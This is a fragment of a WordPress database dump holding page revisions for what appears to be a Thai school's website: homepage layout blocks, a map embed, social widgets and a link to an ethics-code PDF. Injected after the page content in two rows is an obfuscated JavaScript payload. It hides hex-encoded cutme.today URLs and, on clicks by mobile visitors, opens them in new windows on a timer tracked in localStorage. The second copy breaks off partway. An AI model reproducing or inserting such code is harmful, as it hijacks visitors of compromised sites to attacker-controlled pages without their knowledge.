{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 16:10:03','2024-08-08 09:10:03','',14,'http://pakhaeng.ssk.in.th/?p=715',0,'revision','',0),
(716,1,'2024-08-08 17:05:56','2024-08-08 10:05:56','<!-- wp:file {\"id\":720,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ\"></object><a id=\"wp-block-file--media-6c76f6b2-58bf-4e28-b55d-b85a124820f1\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6c76f6b2-58bf-4e28-b55d-b85a124820f1\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 